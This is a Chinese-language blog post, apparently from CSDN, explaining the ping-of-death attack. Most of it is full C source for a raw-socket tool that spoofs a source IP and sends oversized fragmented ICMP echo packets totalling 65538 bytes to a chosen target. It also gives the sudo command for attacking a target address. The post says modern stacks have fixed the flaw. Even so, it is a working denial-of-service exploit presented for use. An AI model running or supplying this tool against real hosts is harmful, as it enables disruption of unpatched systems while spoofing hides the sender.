icmp攻击类型ping-of-death

某些协议栈对于分片报文,事先分配最大IP长度65536字节的缓冲区,而实际接收到的分片在重组时,超过65536的长度将导致缓冲区溢出错误。当前的各个协议栈实现早已修复此问题。

以下程序用于发送超过65536的IP分片报文,首先是头文件部分:

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

其次是初始化初始RAW套接口,以及参数:

int main(int argc, char **argv)
{
        int s;
        char buf[1500];
        const int buflen = 1500;
        struct ip *ip = (struct ip *)buf;
        struct icmp *icmp = (struct icmp *)(ip + 1);
        struct sockaddr_in dst;
        int offset;
        int on = 1;

        if (argc != 3) {
                fprintf(stderr, "usage: %s source hostname\n", argv[0]);
                exit(1);
        }

        bzero(buf, buflen);
        if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("socket");
                exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                perror("IP_HDRINCL");
                exit(1);
        }
        if ((ip->ip_src.s_addr = inet_addr(argv[1])) == -1) {
                fprintf(stderr, "%s: unknown src address\n", argv[1]);
                exit(1);
        }
        if ((ip->ip_dst.s_addr = inet_addr(argv[2])) == -1) {
                fprintf(stderr, "%s: unknown dst address\n", argv[2]);
                exit(1);
        }

        printf("Sending to %s", inet_ntoa(ip->ip_dst));
        printf(" from %s\n", inet_ntoa(ip->ip_src));

初始化IP头部字段,和ICMP信息,类型为(ICMP_ECHO)8,code为0,即ECHO Request(ping)报文:

        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = htons(buflen);
        ip->ip_id = htons(5271);
        ip->ip_off = htons(0);
        ip->ip_ttl = 255;
        ip->ip_p = IPPROTO_ICMP;
        ip->ip_sum = 0; /* set by protocol stack */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

        icmp->icmp_type = ICMP_ECHO;
        icmp->icmp_code = 0;
        icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

最后,发送44个1480字节的分片,共65120字节,第45个分片长度为418字节,总共是65538字节,超过65536的最大长度:

        for (offset = 0; offset < 65536; offset += (buflen - sizeof *ip)/*1480*/) {
                int slen = buflen;

                ip->ip_off = htons(offset >> 3); /* divide by 8. */
                if (offset < 65120/* 1480*44 */) {
                        ip->ip_off |= htons(IP_MF);
                } else {
                        ip->ip_len = htons(418); /* make total 65538 */
                        slen = 418;
                }

                if (sendto(s, buf, slen, 0, (struct sockaddr *)&dst,
                                        sizeof dst) < 0) {
                        fprintf(stderr, "offset %d: errno %d", offset, errno);
                }

                if (offset == 0)
                        memset(icmp, 0, sizeof(struct icmp));
        }
        return 0;
}

编译完成之后,如下调用,需要输入源IP地址,和要攻击的目标IP地址:

$ ./a.out 
usage: ./a.out source hostname
$ 
$ sudo ./a.out 192.168.1.124 192.168.1.109

windows系统在将回复参数错误的ICMP报文,如下图:

在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 编程工作室 设计师:CSDN官方博客 返回首页